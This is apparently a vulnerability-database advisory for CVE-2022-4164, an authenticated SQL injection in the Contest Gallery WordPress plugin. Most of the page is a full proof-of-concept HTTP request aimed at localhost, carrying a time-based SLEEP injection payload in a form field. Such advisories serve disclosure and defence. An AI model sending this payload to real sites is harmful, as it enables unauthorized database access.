Lucene search

K

Contest Gallery < 19.1.5 - Author+ SQL Injection

🗓️ 05 Dec 2022 00:00:00Reported by Daniel KrohmerType 
wpexploit
 wpexploit
👁 72 Views

Contest Gallery SQL Injection via POST reques

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
WPVulnDB
Contest Gallery < 19.1.5 - Author+ SQL Injection
5 Dec 202200:00
wpvulndb
Prion
Cross site request forgery (csrf)
26 Dec 202213:15
prion
Cvelist
CVE-2022-4164 Contest Gallery < 19.1.5 - Author+ SQL Injection
26 Dec 202212:28
cvelist
NVD
CVE-2022-4164
26 Dec 202213:15
nvd
CVE
CVE-2022-4164
26 Dec 202213:15
cve
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------284630601713051351302083313615
Content-Length: 2082
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668392508; wp-settings-5=libraryContent%3Dupload
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgGalleryFormSubmit"

1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="action"

post_cg_gallery_view_control_backend
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgGalleryHash"

355b5e0384230f74e41bc47f47d94aef
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_id"

1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_star

-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_multiple_files_for_post[1]"

[{"id":"' ELSE MultipleFiles END WHERE (id) IN ((1)) and SLEEP(5);#"}]
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_step"

10
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_order"

custom
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgVersionScripts"

19.1.4.1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_search"


-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_email[1]"

[email protected]
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_image_name[1]"

10x-featured-social-media-image-size
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="chooseAction1"

1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgIsRealFormSubmit"

true
-----------------------------284630601713051351302083313615--

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Dec 2022 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.001
72
.json
Report